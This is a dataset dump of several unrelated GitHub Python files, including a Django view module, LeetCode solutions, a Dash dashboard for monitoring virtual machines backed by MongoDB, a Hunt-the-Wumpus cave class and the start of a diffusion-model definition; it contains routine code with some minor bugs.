is_array:\n class_type = android_class_name + '[]'\n else:\n class_type = android_class_name\n class_prop_declaration = class_type.title() + ' ' + android_class_name.lower() + ';'\n return class_prop_declaration\n\n def make_android_class(self, param_dict, android_class_name=None):\n class_name = None\n curr_param_dict = param_dict\n next_param_dict = None\n\n if android_class_name is not None:\n android_class = self.make_android_class_declaration(android_class_name)\n else:\n android_class = None\n\n while curr_param_dict is not None:\n prop_specs = self.make_property_specs(curr_param_dict)\n for prop_spec in prop_specs:\n if prop_spec['type'] is 'Class':\n if android_class is not None:\n # nested class, recurse\n nested_class_name = prop_spec['name']\n nested_param_dict = curr_param_dict[nested_class_name]\n nested_class = self.make_android_class(nested_param_dict, nested_class_name)\n class_decl = self.make_android_class_prop_declaration(nested_class_name)\n android_class += '\\t' + class_decl + '\\n'\n else:\n android_class_name = prop_spec['name']\n android_class = self.make_android_class_declaration(android_class_name)\n next_param_dict = curr_param_dict[android_class_name]\n elif prop_spec['type'] is 'Array':\n # Process the first element as representative of all elements\n next_param_dict = curr_param_dict[android_class_name][0]\n else:\n android_prop_decl = self.make_android_prop_declaration(prop_spec)\n android_class += '\\t' + android_prop_decl + '\\n'\n\n curr_param_dict = next_param_dict\n next_param_dict = None\n\n android_class += '}\\n'\n\n # Save class file\n filename = android_class_name + '.java'\n h = open(filename, 'w')\n h.write(android_class)\n h.close()\n\n return android_class\n\n def make_android_classes(self):\n self.make_android_class(self.param_dict)","repo_name":"davidswi/Craigslist_REST","sub_path":"sugar_class_gen/class_creator.py","file_name":"class_creator.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16989462538","text":"#\n# @lc app=leetcode id=697 lang=python3\n#\n# [697] Degree of an Array\n#\n\n# @lc code=start\nclass Solution:\n # def findShortestSubArray(self, nums: List[int]) -> int:\n # from collections import Counter\n # degree_dic = Counter(nums)\n # degree = max(degree_dic.values())\n # gap = len(nums)\n # reverse_nums = list(reversed(nums))\n # for key in degree_dic:\n # if degree_dic[key] == degree:\n # first = nums.index(key)\n # last = len(nums) - 1 - reverse_nums.index(key)\n # gap = min(last - first + 1, gap)\n # return gap \n def findShortestSubArray(self, nums: List[int]) -> int:\n left, right, count = {}, {}, {}\n for i, x in enumerate(nums):\n if x not in left: left[x] = i\n right[x] = i\n count[x] = count.get(x, 0) + 1\n \n ans = len(nums)\n degree = max(count.values())\n for x in count:\n if count[x] == degree:\n ans = min(ans, right[x] - left[x] + 1)\n\n return ans\n# @lc code=end\n\n","repo_name":"Shawntl/Data-Structure-and-Algorithms","sub_path":"leetcode/697.degree-of-an-array.py","file_name":"697.degree-of-an-array.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17770339878","text":"from django.shortcuts import render, redirect\n\nfrom user.decorators import subject_manager\nfrom .models import Subjects, SubjectDocuments, SubjectImages\nfrom .forms import SubjectsForm, SubjectsDocumentsForm, SubjectsImageForm\nfrom objects.models import Object\n\n\ndef get_subjects(request, pk, code):\n subjects = Subjects.objects.filter(id=pk)\n for item in subjects:\n data = item.id\n image = SubjectImages.objects.filter(subject_id=data)\n documents = SubjectDocuments.objects.filter(subject_id=data)\n title = \"Суб'ект \"\n return render(request, 'objects/subjects/subjects.html',\n {'code': code, 'subjects': subjects, 'title': title, 'image': image, 'documents': documents})\n\n\n@subject_manager\ndef create_subject(request, pk, code):\n form = SubjectsForm()\n if request.method == 'POST':\n form = SubjectsForm(request.POST)\n if form.is_valid():\n subject = form.save(commit=False)\n subject.object_id = pk\n subject.save()\n link = f'/{code}/object/{pk}'\n return redirect(link)\n return render(request, 'objects/subjects/create_subject.html', {'form': form})\n\n\n@subject_manager\ndef update_subject(request, pk, code):\n subjects = Subjects.objects.get(id=pk)\n a = Subjects.objects.filter(id=pk)\n for item in a:\n objects_id = item.object_id\n form = SubjectsForm(instance=subjects)\n if request.method == 'POST':\n form = SubjectsForm(request.POST, instance=subjects)\n if form.is_valid():\n subject = form.save(commit=False)\n subject.object_id = objects_id\n subject.save()\n link = f'/{code}/object/{objects_id}'\n return redirect(link)\n return render(request, 'objects/subjects/create_subject.html', {'form': form})\n\n\n@subject_manager\ndef delete_subject(request, pk, code):\n subject = Subjects.objects.get(id=pk)\n object_id = subject.object_id\n\n if request.method == \"POST\":\n subject.delete()\n link = f'/{code}/object/{object_id}'\n return redirect(link)\n return render(request, 'objects/subjects/delete_subject.html', {'item': subject})\n\n\n@subject_manager\ndef create_subject_image(request, code, pk):\n form = SubjectsImageForm()\n if request.method == 'POST':\n form = SubjectsImageForm(request.POST, request.FILES)\n if form.is_valid():\n subject = form.save(commit=False)\n subject.subject_id = pk\n subject.save()\n link = f'/{code}/object/subject/{pk}'\n return redirect(link)\n\n return render(request, 'objects/subjects/create_subject.html', {'form': form, 'code': code, 'pk': pk})\n\n\n@subject_manager\ndef delete_subject_image(request, code, pk):\n data = SubjectImages.objects.get(pk=pk)\n num = data.subject_id\n if request.method == \"POST\":\n data.delete()\n link = f\"/{code}/object/subject/{num}\"\n return redirect(link)\n return render(request, 'objects/subjects/delete_image.html', {'data': data, 'code': code, 'pk': pk})\n\n\n@subject_manager\ndef create_subject_document(request, code, pk):\n form = SubjectsDocumentsForm()\n if request.method == 'POST':\n form = SubjectsDocumentsForm(request.POST, request.FILES)\n if form.is_valid():\n subject = form.save(commit=False)\n subject.subject_id = pk\n subject.save()\n link = f'/{code}/object/subject/{pk}'\n return redirect(link)\n\n return render(request, 'objects/subjects/create_subject.html', {'form': form, 'code': code, 'pk': pk})\n\n\n@subject_manager\ndef delete_subject_document(request, code, pk):\n data = SubjectDocuments.objects.get(pk=pk)\n num = data.subject_id\n if request.method == \"POST\":\n data.delete()\n link = f\"/{code}/object/subject/{num}\"\n return redirect(link)\n return render(request, 'objects/subjects/delete_document.html', {'data': data, 'code': code, 'pk': pk})\n","repo_name":"Por4ini/Django_project","sub_path":"subjects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71228622827","text":"# Leetcode - https://leetcode.com/problems/find-the-town-judge/\n\nfrom collections import defaultdict\n\nclass Solution:\n\n def findJudge(self, N, trust):\n trust_bucket = [0] * (N + 1) # Contagem de confiança\n\n for a, b in trust:\n trust_bucket[a] -= 1 # como a pessoa confia em alguem, decrementa-se o contador de confiança dela\n trust_bucket[b] += 1 # como a pessoa b é confiável, incrementa-se o contador de confiança dela\n\n for i in range(1, N + 1):\n if trust_bucket[i] == N - 1:\n return i\n\n return -1\n\nsolution = Solution()\nprint(solution.findJudge(2, [[1,2]]))","repo_name":"felipedss/algorithms","sub_path":"python/graph/find-the-town-judge.py","file_name":"find-the-town-judge.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38154024695","text":"#!/usr/bin/python3\n\"\"\"\nA script that prompts a user to enter a string then\ndetermines if its a palindrome\n\"\"\"\ndef reverse(text):\n\t\"\"\"Reverses a text\n\t\"\"\"\n\treturn text[::-1]\n\ndef is_palindrome(text):\n\t\"\"\"Returns the reverse of a text\"\"\"\n\treturn text == reverse(text)\n\t\t\n\nsomething = input('Write something: ')\nforbidden = (' ', ',', '.', '?', '!')\n\nfor character in something:\n\tif character in forbidden:\n\t\t''.join(something)\n\n \nif is_palindrome(something):\n\tprint(f'Yes \\'{something}\\' is palindrome')\nelse:\n\tprint(f'Sorry \\'{something}\\' is not a palindrome')\n\n","repo_name":"yelosolutions/byte_of_python","sub_path":"input_and_output/reverse_io.py","file_name":"reverse_io.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36705860664","text":"# Libraries in use\r\n# Database\r\nimport pymongo\r\n# Dashboard\r\nimport dash\r\nfrom dash.dependencies import Input, Output\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\n# Timescale for graphs\r\nfrom datetime import datetime, timedelta\r\n\r\n# Dashboard initialisation\r\napp = dash.Dash(__name__)\r\napp.css.config.serve_locally = False\r\napp.title = 'Virtual Manager'\r\napp.css.append_css({'external_url':'https://codepen.io/chriddyp/pen/bWLwgP.css'})\r\n\r\n# Navigation bar\r\napp.layout = html.Div([\r\n html.Div([\r\n html.H1('Virtual Monitor',style={\r\n 'padding': '10px',\r\n 'margin':'0',\r\n 'border': '0',\r\n 'color': '#FFFFFF',\r\n 'backgroundColor':'#263240'}),\r\n html.Div([\r\n dcc.Tabs(id=\"tabs\", value='tabs', children=[\r\n dcc.Tab(label='System', value='system'),\r\n dcc.Tab(label='Virtual Machines', value='virtual-machine'),\r\n dcc.Tab(label='Deploy', value='Deploy'),\r\n ]),\r\n html.Div(id='tabs-content'),\r\n ],className='row')\r\n ]),\r\n\r\n # Server settings menu\r\n html.Div([\r\n\r\n ], className=\"four columns\", style={'backgroundColor': '#263240', 'padding': '10px'}),\r\n html.Div([\r\n html.Div([\r\n html.Form([\r\n html.H3('Server settings', style={'color': '#0000000', 'text-align': 'center'}),\r\n html.Div([\r\n html.H6('Server address', style={'color': '#0000000'}),\r\n dcc.Input(value='', type='text', className=\"eleven columns\"),\r\n ], className=\"row\"),\r\n html.Div([\r\n html.H6('Username', style={'color': '#0000000'}),\r\n dcc.Input(value='', type='text', className=\"eleven columns\",\r\n style={}),\r\n ], className=\"row\"),\r\n html.Div([\r\n html.H6('Password', style={'color': '#0000000'}),\r\n dcc.Input(value='', type='password', className=\"eleven columns\",\r\n style={\"padding\": \"20px\"}),\r\n ], className=\"row\"),\r\n html.Div([\r\n html.Button('Submit', id='button',\r\n style={'color': '#FFFFFF', 'backgroundColor': '#111111'}, className=\"twelve columns\")\r\n ], className='row', style={'padding':'20px'})\r\n\r\n ])\r\n ], className=\"four columns\", style={'backgroundColor': '#e8f4f7', 'padding': '10px', 'padding-bottom':'10px','text-align': 'center'})\r\n ], className='row'),\r\n html.Div([\r\n\r\n ],className=\"row\", style={'backgroundColor':'#263240'})\r\n],className=\"row\", style={'backgroundColor':'#263240'})\r\n\r\n# Interactive pages\r\n@app.callback(Output('tabs-content', 'children'),\r\n [Input('tabs', 'value')])\r\ndef render_content(tab):\r\n # List of date times for graphs\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M\")\r\n minus5 = timedelta(minutes=-5)\r\n now_minus_5 = datetime.now() + minus5\r\n current_time_minus_5 = now_minus_5.strftime(\"%H:%M\")\r\n now_minus_10 = datetime.now() + minus5*2\r\n current_time_minus_10 = now_minus_10.strftime(\"%H:%M\")\r\n now_minus_15 = datetime.now() + minus5*3\r\n current_time_minus_15 = now_minus_15.strftime(\"%H:%M\")\r\n now_minus_20 = datetime.now() + minus5*4\r\n current_time_minus_20 = now_minus_20.strftime(\"%H:%M\")\r\n now_minus_25 = datetime.now() + minus5*5\r\n current_time_minus_25 = now_minus_25.strftime(\"%H:%M\")\r\n now_minus_30 = datetime.now() + minus5*6\r\n current_time_minus_30 = now_minus_30.strftime(\"%H:%M\")\r\n\r\n # System information dashboard\r\n if tab == 'system':\r\n return html.Div([\r\n html.Div([\r\n html.H3(children='Resources', style={\r\n 'textAlign': 'center',\r\n 'color': '#ffffff',\r\n 'backgroundColor':'#52687a',\r\n 'padding': '10px'}),\r\n\r\n # Graphs of CPU, RAM and Storage\r\n html.Div([\r\n html.Div([\r\n\r\n dcc.Graph(id='live-update-graph',\r\n figure=dict(\r\n data=[\r\n dict(\r\n x=[current_time_minus_30, current_time_minus_25, current_time_minus_20,\r\n current_time_minus_15, current_time_minus_10, current_time_minus_5,\r\n current_time],\r\n y=[ 90, 92, 93, 93, 92, 91, 94],\r\n name=\"CPU\",\r\n marker=dict(\r\n color='rgb(55, 83, 109)'\r\n )\r\n )\r\n ],\r\n layout=dict(\r\n plot_bgcolor='#E8F4F7',\r\n paper_bgcolor='#E8F4F7',\r\n textfont= dict(color='#ffffff'),\r\n title='CPU usage %',\r\n height=400,\r\n showlegend=True,\r\n\r\n legend=dict(\r\n x=0,\r\n y=1.0\r\n ),\r\n margin=dict(l=40, r=0, t=40, b=30)\r\n ),\r\n ),\r\n )\r\n\r\n ],className=\"four columns\", style={'backgroundColor':'#263240', 'padding': '10px'}),\r\n\r\n html.Div([\r\n dcc.Graph(\r\n figure=dict(\r\n data=[\r\n dict(\r\n x=[current_time_minus_30, current_time_minus_25, current_time_minus_20,\r\n current_time_minus_15, current_time_minus_10, current_time_minus_5,\r\n current_time],\r\n y=[64, 64, 64, 65,\r\n 62, 60],\r\n name='RAM',\r\n marker=dict(\r\n color='rgb(26, 118, 255)'\r\n )\r\n )\r\n\r\n ],\r\n layout=dict(\r\n title='RAM usage %',\r\n showlegend=True,\r\n plot_bgcolor='#E8F4F7',\r\n paper_bgcolor='#E8F4F7',\r\n height = 400,\r\n legend=dict(\r\n x=0,\r\n y=1.0\r\n ),\r\n margin=dict(l=40, r=0, t=40, b=30)\r\n ),\r\n ),\r\n )\r\n\r\n ], className=\"four columns\", style={'backgroundColor':'#263240', 'padding': '10px'}),\r\n html.Div([\r\n dcc.Graph(\r\n figure=dict(\r\n data=[\r\n dict(\r\n x=[current_time_minus_30, current_time_minus_25, current_time_minus_20,\r\n current_time_minus_15, current_time_minus_10, current_time_minus_5,\r\n current_time],\r\n y=[56, 56, 56, 56,\r\n 56, 56,],\r\n name='Storage',\r\n marker=dict(\r\n color='rgb(2, 168, 25)'\r\n )\r\n )\r\n ],\r\n layout=dict(\r\n title='Disk usage %',\r\n height=400,\r\n showlegend=True,\r\n plot_bgcolor='#E8F4F7',\r\n paper_bgcolor='#E8F4F7',\r\n legend=dict(\r\n x=0,\r\n y=1.0\r\n ),\r\n margin=dict(l=40, r=0, t=40, b=30)\r\n ),\r\n ),\r\n )\r\n\r\n ], className=\"four columns\", style={'backgroundColor':'#263240', 'padding': '10px'})\r\n ]),\r\n\r\n\r\n ], className=\"row\", style={'backgroundColor':'#263240', 'bottom': '100px'}),\r\n # Detailed information on system\r\n html.Div([\r\n html.H6('CPU Cores: '+ str(cpu_cores())),\r\n html.H6('CPU Threads: '+ str(cpu_threads())),\r\n html.H6('CPU Sockets: '+ str(cpu_sockets())),\r\n html.H6('CPU Model: '+ str(cpu_model())),\r\n html.H6('Memory: '+ str(memory_size())+ \" GB\"),\r\n html.H6('Total Storage: ' + str(total_storage()) + \" GB\"),\r\n html.H6('Vendor: '+ str(vendor())),\r\n html.H6('Model: '+ str(model())),\r\n html.H6('Server IP: '+ str(server_IP())),\r\n html.H6('vCenter IP: '+ str(vcenter_IP())),\r\n html.H6('No. Network Interfaces: '+ str(network_interfaces()))\r\n\r\n ], style={'backgroundColor': '#e8f4f7'}),\r\n ])\r\n\r\n# Virtual machine informaion dashboard\r\n elif tab == 'virtual-machine':\r\n\r\n return html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(children='Virtual Machines', style={\r\n 'textAlign': 'center',\r\n 'color': '#ffffff',\r\n 'backgroundColor': '#3d4e5c',\r\n 'padding': '20px'}),\r\n ], className= 'row', style={'backgroundColor': '#111111'}),\r\n\r\n # Virtual machine information boxes\r\n html.Div([\r\n html.Div([\r\n html.H6(\"Name: \" + str(virtualMachines('name', 0)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Machine Type: \" + str(virtualMachines('guest', 0)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Description: \" + str(virtualMachines('description', 0)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Power State: \" + str(virtualMachines('power_state', 0)), style={'color': '#FFFFFF'}),\r\n html.H6(\"IP Address: \" + str(virtualMachines('ipaddress', 0)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Memory \" + str(round(virtualMachines('host_memory', 0)/1024, 1)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Assigned Disk: \" + str(round(virtualMachines('host_storage_assigned', 0)/(2**30), 2)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Disc Usage: \" + str(round(virtualMachines('vm_storage_usage', 0)/(2**30), 2)) + \"GB\", style={'color': '#FFFFFF'})\r\n ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n\r\n html.Div([\r\n html.H6(\"Name: \" + str(virtualMachines('name', 1)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Machine Type: \" + str(virtualMachines('guest', 1)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Description: \" + str(virtualMachines('description', 1)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Power State: \" + str(virtualMachines('power_state', 1)), style={'color': '#FFFFFF'}),\r\n html.H6(\"IP Address: \" + str(virtualMachines('ipaddress', 1)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Memory \" + str(round(virtualMachines('host_memory', 1) / 1024, 1)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Assigned Disk: \" + str(round(virtualMachines('host_storage_assigned', 1) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Disc Usage: \" + str(round(virtualMachines('vm_storage_usage' , 1) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'})\r\n ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n ], className= 'row',style={'backgroundColor': '#111111'}),\r\n\r\n html.Div([\r\n html.Div([\r\n html.H6(\"Name: \" + str(virtualMachines('name', 2)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Machine Type: \" + str(virtualMachines('guest', 2)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Description: \" + str(virtualMachines('description', 2)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Power State: \" + str(virtualMachines('power_state', 2)), style={'color': '#FFFFFF'}),\r\n html.H6(\"IP Address: \" + str(virtualMachines('ipaddress', 2)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Memory \" + str(round(virtualMachines('host_memory', 2) / 1024, 1)) + \"GB\",\r\n style={'color': '#FFFFFF'}),\r\n html.H6(\"Assigned Disk: \" + str(\r\n round(virtualMachines('host_storage_assigned', 2) / (2 ** 30), 2)) + \"GB\",\r\n style={'color': '#FFFFFF'}),\r\n html.H6(\r\n \"Disc Usage: \" + str(round(virtualMachines('vm_storage_usage', 2) / (2 ** 30), 2)) + \"GB\",\r\n style={'color': '#FFFFFF'})\r\n ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n\r\n html.Div([\r\n html.H6(\"Name: \" + str(virtualMachines('name', 3)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Machine Type: \" + str(virtualMachines('guest', 3)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Description: \" + str(virtualMachines('description', 3)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Power State: \" + str(virtualMachines('power_state', 3)), style={'color': '#FFFFFF'}),\r\n html.H6(\"IP Address: \" + str(virtualMachines('ipaddress', 3)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Memory \" + str(round(virtualMachines('host_memory', 3) / 1024, 1)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Assigned Disk: \" + str(round(virtualMachines('host_storage_assigned', 3) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Disc Usage: \" + str(round(virtualMachines('vm_storage_usage', 3) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'})\r\n ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n ], className='row', style={'backgroundColor': '#111111', 'padding': '10px'}),\r\n\r\n html.Div([\r\n html.Div([\r\n html.H6(\"Name: \" + str(virtualMachines('name', 4)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Machine Type: \" + str(virtualMachines('guest', 4)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Description: \" + str(virtualMachines('description', 4)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Power State: \" + str(virtualMachines('power_state', 4)), style={'color': '#FFFFFF'}),\r\n html.H6(\"IP Address: \" + str(virtualMachines('ipaddress', 4)), style={'color': '#FFFFFF'}),\r\n html.H6(\"Memory \" + str(round(virtualMachines('host_memory', 4) / 1024, 1)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Assigned Disk: \" + str(round(virtualMachines('host_storage_assigned', 4) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'}),\r\n html.H6(\"Disc Usage: \" + str(round(virtualMachines('vm_storage_usage', 4) / (2 ** 30), 2)) + \"GB\", style={'color': '#FFFFFF'})\r\n ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n ], className='row', style={'backgroundColor': '#111111', 'padding': '10px'}),\r\n ], className=\"twelve columns\", style={'backgroundColor': '#111111',}),\r\n ],style={'backgroundColor': '#263240'}),\r\n html.Div([\r\n html.h3('vm', style={'color': '#FFFFFF', 'text-align': 'center'}),\r\n ],style={'backgroundColor': '#263240', 'padding': '50px'})\r\n\r\n # Virtual machine deployment page\r\n elif tab == 'Deploy':\r\n return html.Div([\r\n html.Div([\r\n # Deployment form\r\n html.Form([\r\n html.H3('Deploy VM', style={'color': '#FFFFFF', 'text-align': 'center'}),\r\n html.Div([\r\n html.H6('VM Name', style={'color': '#FFFFFF'}),\r\n dcc.Input(value='', type='text', className=\"ten columns\"),\r\n ], className=\"row\"),\r\n html.Div([\r\n html.H6('Description', style={'color': '#FFFFFF'}),\r\n dcc.Input(value='', type='text', className=\"ten columns\", style={'backgroundColor': '#3d4e5c', \"padding\": \"20px\"}),\r\n ], className=\"row\"),\r\n html.H6('RAM', style={'color': '#FFFFFF'}),\r\n # Auto adjusting slider\r\n dcc.Slider(\r\n min=0,\r\n max=round(avaliable_resources('memory')),\r\n marks={i: '1'.format(i) if i == 1 else str(i) for i in range(1, 32)},\r\n value=1,\r\n ),\r\n html.H6('CPU Cores', style={'color': '#FFFFFF'}),\r\n dcc.Slider(\r\n min=0,\r\n max=24,\r\n marks={i: '1'.format(i) if i == 1 else str(i) for i in range(1, 24)},\r\n value=1,\r\n ),\r\n html.Div([\r\n html.H6('OS Type', style={'color': '#FFFFFF'}),\r\n html.Div([\r\n dcc.Dropdown(\r\n options=[\r\n {'label': 'Windows', 'value': 'Windows'},\r\n {'label': 'Linux', 'value': 'Linux'},\r\n {'label': 'Other', 'value': 'Other'}\r\n ],\r\n value=''\r\n ),\r\n ], className=\"ten columns\"),\r\n ], className=\"row\"),\r\n html.H6('Disk size in GB', style={'color': '#FFFFFF'}),\r\n html.Div(dcc.Input(id='input-box', type='number'), className=\"ten columns\"),\r\n # Form submission button\r\n html.Div([\r\n html.Button('Submit', id='button',\r\n style={'color': '#FFFFFF', 'backgroundColor': '#111111', \"float\": \"right\"}, className=\"five columns\")\r\n ], className=\"row\")\r\n ])\r\n ], className=\"six columns\", style={'backgroundColor': '#3d4e5c', 'padding': '10px'}),\r\n # Live remaining resources\r\n html.Div([\r\n html.H3('Remaining Resources', style={'color': '#111111'}),\r\n html.H5(\"RAM: \" + str(round(avaliable_resources('memory'), 2)) + \" GB remaining\"),\r\n html.H5(\"Storage: \" + str(round(remaining_storage(), 2)) + \" GB remaining\"),\r\n ], className=\"six columns\", style={'backgroundColor': '#e8f4f7', 'padding': '10px', 'text-align':'center'})\r\n ], className='row')\r\n\r\n# Retrieve virtual machine information from database\r\ndef virtualMachines(appliance, id):\r\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n mydb = myclient[\"Virtual_Machines\"]\r\n mycol = mydb[\"Machines\"]\r\n try:\r\n for vm in mycol.find({\"id\" : id}):\r\n # print(vm)\r\n results = vm\r\n del results['_id']\r\n vm_name = results[appliance]\r\n return vm_name\r\n except:\r\n vm_name = '0'\r\n return vm_name\r\n\r\n\r\n# Retrieve system information from database\r\ndef systemSpecs(value):\r\n try:\r\n component = []\r\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n mydb = myclient[\"System_Specs\"]\r\n mycol = mydb[\"Specs\"]\r\n\r\n results = mycol.find({\"_id\": 0})\r\n for info in results:\r\n info.pop('_id')\r\n for specs in info:\r\n component.append(info[specs])\r\n return str(component[value])\r\n except:\r\n return \"Failed to retrieve data\"\r\n\r\n\r\n# Select coresponding piece of hardware to retrieve from database\r\ndef cpu_cores():\r\n return systemSpecs(0)\r\n\r\n\r\ndef cpu_sockets():\r\n return systemSpecs(1)\r\n\r\n\r\ndef cpu_threads():\r\n return systemSpecs(2)\r\n\r\n\r\ndef cpu_mhz():\r\n return systemSpecs(3)\r\n\r\n\r\ndef cpu_model():\r\n return systemSpecs(4)\r\n\r\n\r\ndef memory_size():\r\n return round(float(systemSpecs(5)) / 2**30, 2)\r\n\r\n\r\ndef vendor():\r\n return systemSpecs(6)\r\n\r\n\r\ndef model():\r\n return systemSpecs(7)\r\n\r\n\r\ndef server_IP():\r\n return systemSpecs(8)\r\n\r\n\r\ndef vcenter_IP():\r\n return systemSpecs(9)\r\n\r\n\r\ndef network_interfaces():\r\n return systemSpecs(10)\r\n\r\n\r\ndef remaining_storage():\r\n return round(float(systemSpecs(11)) /2**30, 2)\r\n\r\n\r\ndef total_storage():\r\n return round(float(systemSpecs(12)) /2**30, 2)\r\n\r\n\r\n# Calaculate remaining resources of system\r\ndef avaliable_resources(value):\r\n vm_usage = float(get_data(10)) / 1024\r\n print(vm_usage)\r\n total_system_memory = float(systemSpecs(5)) / 1024**3\r\n print(total_system_memory )\r\n remaining = total_system_memory- vm_usage\r\n print(remaining)\r\n return remaining\r\n\r\n# Retrieve storage or memory usage\r\ndef get_data(value):\r\n try:\r\n component = []\r\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n mydb = myclient[\"Virtual_Machines\"]\r\n mycol = mydb[\"Machines\"]\r\n\r\n results = mycol.find({})\r\n for info in results:\r\n info.pop('_id')\r\n for specs in info:\r\n component.append(info[specs])\r\n return str(component[8])\r\n except:\r\n return 0\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(host=\"0.0.0.0\")\r\n","repo_name":"RyanStarr/Final-Year-Project","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":23552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10324282755","text":"class Cave:\n \"\"\"\n This class is for managing the state of individual cave rooms.\n It should contain connections to other cave rooms.\n \"\"\"\n\n def __init__(self, name):\n self.name = name\n self.connections = []\n self.pit = False\n self.bat = False\n self.wumpus = False\n\n def is_safe(self):\n return not (self.pit or self.bat or self.wumpus)\n\n def add_connection(self, cave):\n \"\"\"\n Connect this cave to another.\n The reverse connection is automatically created.\n \"\"\"\n\n if cave not in self.connections:\n self.connections.append(cave)\n if self not in cave.connections:\n cave.connections.append(self)\n\n def __str__(self):\n return self.name\n\n\nCAVE_NAMES = [\n \"Airy Alcove\", \"Bat-Filled Basement\", \"Charred Chasm\", \"Dank Dungeon\",\n \"Eerie Eyelet\", \"Frightening Fissure\", \"Ghastly Grotto\", \"Heated Hellhole\",\n \"Incendiary Interior\", \"Janky Jail\", \"Killer Karst\", \"Lame Lounge\",\n \"Meandering Mists\", \"Putrid Passage\", \"Sulfurous Sinkhole\", \"Terrible Tube\",\n \"Undulating Underground\", \"Vertical Vastness\", \"Nasty Nest\",\n \"Offal-Filled Opening\"\n]\n\nCAVE_CONNECTIONS = [[0, 1, 4, 5], [1, 7, 2], [2, 9, 3], [3, 11, 4], [4, 13],\n [5, 6, 14], [6, 7, 16], [7, 8], [8, 9, 17], [9, 10],\n [10, 11, 18], [11, 12], [12, 13, 19], [13, 14], [15, 16],\n [16, 17], [18, 19]]\n","repo_name":"momentum-cohort-2019-09/examples","sub_path":"w5d4--hunt-the-wumpus/cave.py","file_name":"cave.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18104771597","text":"from random import random\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom fairseq import utils\nfrom fairseq.models import register_model, register_model_architecture, transformer\nfrom fairseq.models.nat import NATransformerModel\nfrom fairseq.modules.transformer_sentence_encoder import init_bert_params\n\nfrom improved_diffusion.gaussian_diffusion import GaussianDiffusion\nfrom improved_diffusion.respace import SpacedDiffusion, space_timesteps\n\nfrom .modules import DifformerEncoder, DifformerDecoder\nfrom .utils import get_named_beta_schedule\n\n\n@register_model(\"difformer\")\nclass Difformer(NATransformerModel):\n @staticmethod\n def add_args(parser):\n NATransformerModel.add_args(parser)\n\n parser.add_argument(\n \"--model-dim\",\n type=int, metavar=\"N\",\n help=\"The dimension of the model\"\n )\n parser.add_argument(\n \"--latent-dim\",\n type=int, metavar=\"N\",\n help=\"The dimension of $z_t$\"\n )\n\n parser.add_argument(\n \"--share-project-in-dim\",\n action=\"store_true\",\n help=\"Share projection layers of the encoder and decoder\"\n )\n\n parser.add_argument(\n \"--diffusion-steps\",\n type=int, metavar=\"N\", default=2000,\n help=\"Diffusion steps\"\n )\n\n parser.add_argument(\n \"--noise-schedule\",\n type=str, metavar=\"STR\", default=\"sqrt\",\n help=\"The noise schedule during training\"\n )\n parser.add_argument(\n \"--noise-factor\",\n type=float, metavar=\"D\", default=1.0,\n help=\"The noise factor during training\"\n )\n parser.add_argument(\n \"--rescale-factor\",\n type=float, metavar=\"D\", default=1.0,\n help=\"When change the noise factor, both the signal-to-noise ratio (SNR) of the 